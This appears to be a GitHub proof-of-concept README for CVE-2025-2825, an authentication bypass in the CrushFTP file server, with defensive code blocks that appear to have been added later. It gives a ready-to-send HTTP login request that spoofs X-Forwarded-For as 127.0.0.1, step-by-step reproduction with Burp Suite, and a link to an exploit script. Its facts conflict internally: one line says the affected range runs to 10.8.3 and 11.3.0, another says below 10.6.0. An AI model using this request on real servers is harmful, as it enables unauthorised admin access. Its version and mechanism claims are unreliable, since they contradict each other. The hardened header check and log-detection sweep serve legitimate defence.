PoC details: e7da2299f818a1ddc48bdbcd7c0f02cb29a8cd0b

Source
Related vulnerability
Title: CrushFTP security vulnerability (CVE-2025-2825)
Description: CrushFTP is a file transfer server from the company CrushFTP. CrushFTP versions 10.0.0 through 10.8.3 and 11.0.0 through 11.3.0 contain a security vulnerability that may allow unauthenticated access.
Description
Authentication Bypass PoC for CVE-2025-2825 – Exploiting CrushFTP 10.x
Introduction
![CVE](https://img.shields.io/badge/CVE-2025--2825-red)
![Exploit-Status](https://img.shields.io/badge/status-exploitable-critical)

# 🚨 CVE-2025-2825 – CrushFTP Authentication Bypass

## 🔎 Overview

**CVE-2025-2825** is a critical authentication bypass vulnerability affecting **CrushFTP**, a widely used secure file transfer server. The flaw allows remote attackers to bypass login authentication and gain administrative access by spoofing headers — tricking the server into thinking the request came from localhost.

- **Severity:** Critical  
- **CVSS Score:** 9.8  
- **Attack Vector:** Remote  
- **Affected Versions:** CrushFTP < v10.6.0  
- **Fixed In:** v10.6.0 and above  
- **Status:** Under active exploitation in the wild  

---

## 🧠 Technical Details

The vulnerability arises due to improper validation of the `X-Forwarded-For` header. When this header is set to `127.0.0.1`, the server treats the request as local — bypassing authentication.
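To make the flaw in that paragraph concrete from the server side, the following is an added example (not CrushFTP's code, and not a reproduction of its actual parsing) that places a "trust the header from anyone" check beside a hardened version. The names `is_local_request_vulnerable`, `is_local_request_hardened`, `resolve_client_ip` and the `TRUSTED_PROXIES` value are assumptions made for this example.

```python
"""Resolving the client address from X-Forwarded-For.

The flawed check mirrors the behaviour the README describes: any peer
that sends X-Forwarded-For: 127.0.0.1 is treated as a local request.
The hardened check only believes the header when the TCP peer is a
known reverse proxy, and then only the rightmost hop that is not itself
a trusted proxy.

Added example; not CrushFTP's code. Names and addresses are assumptions.
"""
from __future__ import annotations

import ipaddress

# Reverse proxies allowed to set X-Forwarded-For (assumed for this example;
# a real deployment lists its own proxy addresses here).
TRUSTED_PROXIES = {ipaddress.ip_address("10.0.0.5")}

LOOPBACK = ipaddress.ip_network("127.0.0.0/8")


def is_local_request_vulnerable(peer_ip: str, headers: dict) -> bool:
    """Flawed check: honours X-Forwarded-For from any peer.

    Anyone who can reach the listener can claim to be 127.0.0.1, so a
    privilege decision built on this value is attacker-controlled.
    """
    claimed = headers.get("X-Forwarded-For", peer_ip).split(",")[0].strip()
    try:
        return ipaddress.ip_address(claimed) in LOOPBACK
    except ValueError:
        return False


def resolve_client_ip(peer_ip: str, headers: dict) -> ipaddress.IPv4Address | ipaddress.IPv6Address:
    """Return the address the server should treat as the real client.

    - Direct connections (peer not a trusted proxy): the header is ignored.
    - Connections from a trusted proxy: walk the chain from the right,
      skipping trusted proxies, and take the first other hop. Hops further
      left were supplied by the client and are not trusted.
    - Malformed entries fall back to the proxy's own address.
    """
    peer = ipaddress.ip_address(peer_ip)
    if peer not in TRUSTED_PROXIES:
        return peer
    raw = headers.get("X-Forwarded-For", "")
    hops = [h.strip() for h in raw.split(",") if h.strip()]
    for hop in reversed(hops):
        try:
            addr = ipaddress.ip_address(hop)
        except ValueError:
            return peer
        if addr not in TRUSTED_PROXIES:
            return addr
    return peer


def is_local_request_hardened(peer_ip: str, headers: dict) -> bool:
    """Correct check: only a genuinely local client counts as local."""
    return resolve_client_ip(peer_ip, headers) in LOOPBACK


if __name__ == "__main__":
    spoofed = {"X-Forwarded-For": "127.0.0.1"}
    print("vulnerable:", is_local_request_vulnerable("203.0.113.9", spoofed))  # True
    print("hardened:  ", is_local_request_hardened("203.0.113.9", spoofed))    # False
```

The important design point is that the privilege decision is derived from the transport peer first and from the header only as a refinement supplied by an explicitly trusted proxy; a header that arrives on a direct connection never participates in the decision at all.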

---

## 🧪 Proof of Concept (PoC)

### 🔸 HTTP Request Example:

```http
GET /WebInterface/login.html?command=validate&username=Admin&password=any HTTP/1.1
Host: target-ip
X-Forwarded-For: 127.0.0.1
```

> 📝 Replace `target-ip` with the actual IP address of the target CrushFTP server.

If successful, the server bypasses authentication and grants access — even with incorrect credentials.

---

## 🔗 PoC Python Script

[📄 cve-2025-2825-poc.py](./cve-2025-2825-poc.py)

---

## 🛠️ Tools & Technologies Used

- **Python** – scripting the exploit  
- **Burp Suite** – intercepting and modifying HTTP headers  
- **Wireshark** – packet capture and analysis  
- **Nmap** – port scanning and service enumeration  
- **CrushFTP** – vulnerable target instance  
- **GitHub** – for publishing PoC and documentation  

---

## 📝 Steps to Reproduce

1. Set up a vulnerable version of CrushFTP (v10.5 or earlier).
2. Intercept the login request using Burp Suite.
3. Modify the HTTP request header:
   ```
   X-Forwarded-For: 127.0.0.1
   ```
4. Forward the request.
5. Admin access is granted without valid credentials.

---

## ✅ Mitigation

- Upgrade to CrushFTP **v10.6.0** or higher.
- Only honour `X-Forwarded-For` (and similar forwarding headers) when the connection comes from a trusted reverse proxy; never derive trust or privilege from a header the client can set.
- Restrict admin access to localhost or place it behind a VPN/firewall.
- Monitor logs for suspicious access patterns, such as requests that claim a loopback address in `X-Forwarded-For` while arriving from an external peer.
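As an added example of the log monitoring the last point asks for (not part of the original PoC), the sweep below flags requests whose `X-Forwarded-For` names a loopback address although the peer that sent them is not a trusted proxy, and marks the ones aimed at the login endpoint. The log format, the `LOG_RE` pattern, the `TRUSTED_PROXIES` value and the sample lines are all constructed for this example; adapt the pattern to the access-log format of the CrushFTP instance or reverse proxy actually in use.

```python
"""Detection sweep for X-Forwarded-For loopback spoofing in access logs.

Added example; not CrushFTP's code. Log format and sample lines are
constructed, and the proxy address is an assumption.
"""
import ipaddress
import re

# Proxies allowed to set X-Forwarded-For (assumed value for this example).
TRUSTED_PROXIES = {ipaddress.ip_address("10.0.0.5")}
LOOPBACK = ipaddress.ip_network("127.0.0.0/8")

# Constructed format:  peer_ip "METHOD path" status "xff-header-or-dash"
LOG_RE = re.compile(
    r'^(?P<peer>\S+) "(?P<method>[A-Z]+) (?P<path>\S+)" (?P<status>\d{3}) "(?P<xff>[^"]*)"$'
)

# Constructed sample lines (not real traffic). Line 1 is the README's PoC
# request as it would appear if sent directly to the server; line 2 is a
# legitimate login relayed by the trusted proxy.
SAMPLE_LOG = """\
203.0.113.9 "GET /WebInterface/login.html?command=validate&username=Admin&password=any" 200 "127.0.0.1"
10.0.0.5 "GET /WebInterface/login.html?command=validate&username=alice&password=x" 200 "198.51.100.7"
198.51.100.7 "GET /WebInterface/" 302 "-"
203.0.113.9 "GET /WebInterface/function/" 200 "127.0.0.1, 10.0.0.5"
"""


def parse_line(line: str):
    """Return the named fields of one log line, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def xff_claims_loopback(xff: str) -> bool:
    """True if any hop in the X-Forwarded-For chain is a loopback address."""
    if xff in ("", "-"):
        return False
    for hop in xff.split(","):
        try:
            if ipaddress.ip_address(hop.strip()) in LOOPBACK:
                return True
        except ValueError:
            continue  # unparsable hop: not a loopback claim, keep scanning
    return False


def find_spoofed_local_requests(log_text: str) -> list:
    """Return (peer, path, xff, is_login) for each suspicious request.

    A request is suspicious when X-Forwarded-For names a loopback address
    but the sending peer is not one of our trusted proxies: a real proxy
    would never forward a loopback client, and any other peer has no
    business setting the header at all. is_login marks hits against the
    login endpoint, which are the ones matching the bypass pattern.
    """
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        peer = ipaddress.ip_address(rec["peer"])
        if peer in TRUSTED_PROXIES:
            continue
        if xff_claims_loopback(rec["xff"]):
            is_login = "command=validate" in rec["path"]
            hits.append((rec["peer"], rec["path"], rec["xff"], is_login))
    return hits


if __name__ == "__main__":
    for peer, path, xff, is_login in find_spoofed_local_requests(SAMPLE_LOG):
        tag = "LOGIN-BYPASS-PATTERN" if is_login else "SPOOFED-XFF"
        print(f"ALERT {tag} peer={peer} xff={xff!r} path={path}")
```

Run on the constructed sample, the sweep reports lines 1 and 4 and stays silent on the proxied login and the request that carries no header; tuning it for production mostly means encoding the real proxy addresses and log layout.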

---

## 👨‍💻 Author

**Shivshant Patil**  
Certified Ethical Hacker (CEH v13)  
B.Tech Computer Engineering Graduate  
🔗 [LinkedIn Profile](https://www.linkedin.com/in/shivshant-patil-b58aaa281)  
🔗 [Github Profile](https://github.com/Shivshantp)


File snapshot

```
[4.0K] /data/pocs/e7da2299f818a1ddc48bdbcd7c0f02cb29a8cd0b
├── [ 509] cve-2025-2825-poc.py
└── [2.7K] README.md

0 directories, 2 files
```